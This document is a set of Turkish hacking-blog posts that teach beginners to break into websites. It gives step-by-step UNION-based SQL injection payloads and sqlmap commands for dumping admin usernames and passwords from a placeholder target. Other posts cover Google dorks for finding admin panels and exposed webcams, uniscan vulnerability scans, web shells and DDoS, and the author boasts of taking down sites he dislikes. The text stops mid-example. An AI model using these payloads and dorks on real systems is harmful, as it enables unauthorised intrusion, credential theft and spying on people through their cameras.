5-)Manuel Sql İnjection

hackadairhersey Sql İnjection Hiç yorum yok

Manuel Sql İnjection,sql injection,gelişmiş sql injection,manuel sql enjeksiyon,elle sql hack,hack,sql.

Arkadaşlar bu konuyu çok özenle hazırladım her kodu sizin için açıkladım bu yüzden full yazı yazdım işin mantığı için okuyun. Ve takıldığınız yeri yorumda sorun lütfen.

Arkadaşlar sql injection hack yapacaksanız eğer size sadece manuel sql öneririm çünkü programı yazan kişide bir insandır ve o programlarda bizim burada çalıştıracağımız kodları çalıştırıyor.

Ama o programları yazan kişiler sql hakkında baya bilgili kişiler olduğu için manuel sql size onların programından daha etkisiz gelebilir.Ama öyle değildir ileri düzey düşüneceğiz ve "ileri düzey sql injection" ile o programların çekemediği bilgileri çekeceğiz.

öncelikle sitemizde sql injection açığının olduğundan emin olmalıyız.

bkz. Elle(manuel) Sql Açığı Tespit Etme

site: hedefsite.com/index.php?id=1

order by 1 diyoruz ve "1" i sırayla arttırıyoruz mesela diyelim order by 8 yaptık site normal açıldı ama order by 9 yapınca bozulduysa bu sitede 8 tane kolon vardır.

hedefsite.com/index.php?id=1 order by 1

ardından union select 1,2,3,4,5,6,7,8 --> 8 kolon olduğu için 8'e kadar.
böyle yapınca ekrana bakıyoruz herhangi bir sayı arıyoruz bu sitede 2 sayısı yansıdı o zaman sql komutlarını 2 sayısını silip orada çalıştırabiliriz.

hedefsite.com/index.php?id=1union select 1,2,3,4,5,6,7,8

union select 1,Database(),3,4,5,6,7,8 bu sitemizin database ismi :)

hedefsite.com/index.php?id=1 union select 1,Database(),3,4,5,6,7,8

union select 1,version(),3,4,5,6,7,8 buda sitenin versiyonu eğer 5 ve üstü ise bu kodları çalıştıracağız ama eğer 4 ise hiç ugrasmayın :)

union select 1,Group_concat(table_name),3,4,5,6,7,8 from information_schema.tables --> "information_schema" her sitede bulunur bizim db ye ulaşmamızı sağlar. bu kod ile tabloları istedik

hedefsite.com/index.php?id=1 union select 1,Group_concat(table_name),3,4,5,6,7,8 from information_schema.tables

union select 1,Group_concat(column_name),3,4,5,6,7,8 from information_schema.columns bu kod ile kolonları istedik

hedefsite.com/index.php?id=1 union select 1,Group_concat(column_name),3,4,5,6,7,8 from information_schema.columns

union select 1,kolon adı,3,4,5,6,7,8 from tablo adı admin bilgilerinin olduğu tablodan kolonları yansıtmasını istedik :) ve admin username ve password :)

4-)Online Web Kameralarının Tespiti

Unknown Exploit Hiç yorum yok

Online Web Kameralarının tespiti

Yanlış duymadınız :=) internette dolaşan bir çok kameraya bu exploit sayesiden ulaşabileceksiniz.

[intitle:’my webcamXP Server’]

kriterinin girilmesi yeterli oluyor

bunun nerden çıktığını merak ediyorsanız şuraya bakın

Exploit Nedir ve Google Gelişmiş Arama Tekniği

3-)Admin Panel Bulma Exploiti

Unknown Exploit Hiç yorum yok

Önce --> Exploit Nedir ve Google Gelişmiş Arama Tekniği

Arkadaşlar bu konuları okuyun yoksa anlamazsınız. Admin panel bulmada baska bilinmeyen bir yöntemi göstereceğim

mesela bi sitenin db bilgilerini çektiniz ama admin panelini bulamadınız o zaman bi de şu yöntemi deneyin

site:hedefsite.com/ inurl:admin

site:hedefsite.com/ inurl:login

burada kırmızı renk olan yere istediğinizi yazın size kalmış tutturursanız ulaşacaksınız panele.

2-)Google Gelişmiş Arama Tekniği

Unknown Exploit Hiç yorum yok

blog hayatım boyunca tek alıntı konum bu çünkü bende aynı şeyleri yazacaktım sizin için en iyiyi araştırıyorum.

Google’ın marifetlerini daha iyi anlayabileceğiniz arama tekniklerine göz atacağız.

filetype:

Dosya uzantılarına göre arama yapabileceğiniz bu komutla, arama kriterinizi içeren bilgilere ait dökümanlara ulaşabilirsiniz.

Örneğin [filetype: pdf ‘MacOS X’] yazdığınızda, MacOS X kelimesinin geçtiği 11.700 adet .pdf dosyasına ulaşabiliyoruz. Bulduğunuz belgeleri indirmeden önce ‘HTML olarak görüntüle’ linkine tıklayarak, içeriğine gözatabilirsiniz. Filetype operatörünün diğer alternatifi de ext: operatörüdür (extension) ve aynı mantıkla çalışır.

allintitle:

Bu komut, arama kriterinizde yer alan kelimelerin tamamının, internet tarayıcısının başlık çubuğunda yer almasını şart koşar. Örnek verecek olursak, [allintitle:’Flash Movies’] şeklindeki arama kriterinin sonucu olarak, web sayfasının title bilgisi üzerinde Flash Movies kelimeleri geçen sayfalar listelenecektir.

intitle:

‘allintitle’ komutundan farklı olarak, ilk arama kriterini başlık satırında arar, diğer kelimeleri ise metin içerisinde kontrol edilir.

allinurl:

Bu operatör, arama kriterine ait kelimeleri internet adres satırındaki (url) kelimeler içerisinde arar.
inurl:
İlk arama kriterini adres satırında arar.

cache:

Listelenen web sayfalarına ait sunuculara ulaşılamadığı durumlarda, cache operatörünü kullanarak, ilgili sayfaya Google’ın daha önce indekslediği bilgiler üzerinden ulaşabilirsiniz.

site:

Bu operatörü kullanarak, herhangi bir web sitesi içerisinde arama yapabilirsiniz. Örneğin [site:www.macline.com.tr Adobe] kriterini girdiğinizde, Macline web sitesi içerisinde ‘Adobe’ kelimesi geçen sayfalara ulaşabilirsiniz.

Link:

Bu komutu kullanarak herhangi bir web sitesine hangi sayfalardan link verildiğini öğrenebilirsiniz.
Bu operatörler tek başlarına kullanılabildiği gibi, birarada da kullanılabilmektedir. Örnek vermek gerekirse:

[intitle:Fiyat Listesi filetype: pdf]
[intitleVD Video filetype: pdf]
[intitle:mp3 ‘eye of the tiger’]
[site:edu intitle:science]

1-)Exploit Nedir Ne İşe Yarar

Unknown Exploit Hiç yorum yok

exploit:

Şöyle söyliyeyim bir ev düşünün bu evi sızmak istediğimiz hedef website olarak düşünün bu evin kapısının anahtarı sayesinde eve girebileceğiz. İşte bu anahtar exploit oluyor.:) Yani exploitler sayesiden hedef sistemlere sızabiliriz bu sistem site olur,bilgisayar olur ve saire yine kolaylaştırdım sizin için ;)

3-)Uniscan Kullanımı

Unknown Web Güvenlik Açıkları-Hack Hiç yorum yok

Arkadaşlar ben anlatımı kali linuxdan yapıyorum sizin için uniscan'ın windowsa nasıl yüklendiğini atıyorum ama kullanımda bir farklılık yok.

öncelikle

"uniscan help" komutunu verdiğimiz zaman bize nasıl taramalar yapacağımızı gösteriyor ben size bir sitenin güvenlik açıkları nasıl taranır onu göstereceğim, bunun dısında sitenin ip sini vererek, işte sitelerin ismini bir metin belgesine yazıp birden fazla site taratma seçenekleride var ama onlara gerek yok.

Bide siz benden farklı olarak programı uniscan.pl olarak çalıştıracaksınız ben .pl yazmıyorum

Arkadaşlar fotoğrafta -q , -w , -e , -d , -s harflerinin karşısında olanları isteyeceğiz programdan(perlden) ; bunları isteyince program sitenin dizindeki dosyalarını bulacak,güvenlik açıklarını tarayacak bizede bunlar lazım e mail bilgileri v.s. de çıkaraktır.

evet komut şu:

uniscan -u http://www.hedefsite.com/ -qweds

Takıldığınız her nokta için buradayım

İndirme Linkleri

Uniscan

Python Direkt İndir

Windows'a Uniscan Kurulumu

3-)Shell Nedir Ne İşe Yarar

Unknown Giris Hiç yorum yok

Çok Basit.

Shell, hacklemek istediğimiz bir sitede bize admin yetkilerini veren php veya asp ile yazılmış bir tür scriptdir.

Bu dosyayı eğer hedef siteye yükleyebilirsek , upload edebilirsek shell aracılığıyla düzenlemeler yapabiliriz.

Upload Hack

1-)Güvenlik açığı nedir

Unknown Web Güvenlik Açıkları-Hack Hiç yorum yok

Girişte bilmeniz gereken ilk konulardan birine değineceğim.

Güvenlik Açığı nedir?

Bir sistemi ele geçirmek veya hacklemek istyorsanız o sistemde öncelikle bir güvenlik açığı bulmak zorundasınız. Biz siteler üzerinde ilerleyeceğimiz için bizim bulmamız gereken şey website güvenlik açığıdır.Yönetici panelini bulduktan sonra bulmamız gereken şey web güvenlik açığıdır ;).

Web güvenlik açıkları sayesinde yönetici bilgilerini ele geçirip yöneticiye ait giriş paneli yani "admin paneli" nden o bilgilerle giriş yapıp site üzerinde sınırsız yetkiye sahip olabilirsiniz.

Başlıca Website Güvenlik Açıkları

Sql İnjection ve Çeşitleri <--- Çok önemlidir.

Dosya Upload

XSS

Brute Force

Ddos

Rfi-Lfi

CSRF

>>>> Web Güvenlik Açıklarını Nasıl Bulurum?

2-)Sql injection

Unknown Sql İnjection Hiç yorum yok

Önce şu makalemi okumanız gerek ;) Elle(manuel) Sql Açığı Tespit Etme

sonrada şunu :) konuyu anlamanız için Veritabanı(Database) Nedir??
Arkadaşlar varya bu açık görüp görebileceniz hem çok hemde etkili bir numaralı açıktır.

Bu açık sayesinde

- Site içerisinde sql komutları çalıştırabileceksiniz.
- Veritabanından admin bilgilerini alabilirsiniz.(sql komutları sayesinde)
- Siteye Herhangi bir dosya çekebilirsiniz.
- Admin dışında site ilgili tüm bilgileri alabilirsiniz..(sql komutları sayesinde)

Bu açık ile bir siteyi hacklemek için 2 yol var.

1.Mevcut programlar
2.Manuel(el ile)

El ile yaparsanız bilmeniz gereken sql komutları vardır ve en kesin sonuçları bu şekilde alırsınız çünkü önemli siteler programlar ile bypass(aşılması gereken engelleri aşmaya deniyor) edilemiyor.

1.Mevcut programlar
A.Havij ile Sql İnjection
B. Sqlmap ile sql injection

4-)Ddos Nedir Ddos Saldırıları

hackadairhersey Giris Hiç yorum yok

Arkadaşlar ben blogumda hedef site hackı anlatmak istiyorum bu da hedef site hacktır ama bunu yapmak için birden çok bilgisayara yada "bot" a ihtiyacınız var bot bulamazsınız internette dolaşanlar ya virüsdür ya da işe yaramaz bende bi tane var gıcık aldığım siteleri anında kapatıyorum ama uzun süreli olmuyor uzun süreli olması için uzun süre saldırmam gerekiyor ama uğraşmıyorum biz ele geçirmeyi hedeflediğimiz için bu yöntemi gereksiz buluyorum.

Nedir

Arkadaşlar kendi bilgisayarınızdan hedef siteye bazı sorgular gönderiyorsunuz programlar aracılığıyla yada cmd üzerinden.Fakat bu işi yaparken sorguları hızlı bir şekilde gönderiyoruz sorgulara cevap gelmeden yeni bir sorgu gönderiyor programlar sitelerde cevap veremeyince bir süre sonra sunucu bu biriken sorguları kaldıramıyor ve nakavft :)

4-)Sqlmap ile sql injection

hackadairhersey Sql İnjection Hiç yorum yok

Sqlmap...

Bu python diliyle yazılmış olan aracı kullanarak Sql injection yaparken hem pro olarak hemde kolay bir şekilde sitelerin bilgilerini çekebileceksiniz.

Fakat bilmeniz gereken bazı sqlmap kodları vardır bunları ezberlemek kolaydır ben mantıklı anlatmaya çalışacağım bu yüzden kolay ezberleyeceksiniz.

1-sql injection yaparken önce database ismini bulacaksınız.

2-Admin bilgilerinin bulunduğu tablo ismini bulacaksınız

3-Admin bilgilerinin bulunduğu kolonu bulup

Bilgileri isteyeceğiz.Sıralama Database>tablo>kolon.

İşte kodları yazarkende aynı bu şekilde isteyceğiz.Başlayalım.

Ben kali linux kullandığım için biraz farklı görünebilir ama kodlar aynıdır tek fark siz sqlmap.py yazarak çalıştıracaksınız komut yazarken.

sqlmap -u site --dbs (databaseismini istiyoruz)

sqlmap -u site -D dbismi --tables (bulduğumuz db ismini yazıp tabloyu istiyoruz)

sqlmap -u site -D dbismi -T tabloismi --columns (kolon)

sqlmap -u site -D dbismi -T tabloismi -C colonismi --dump (ve bilgiler)

örnek..)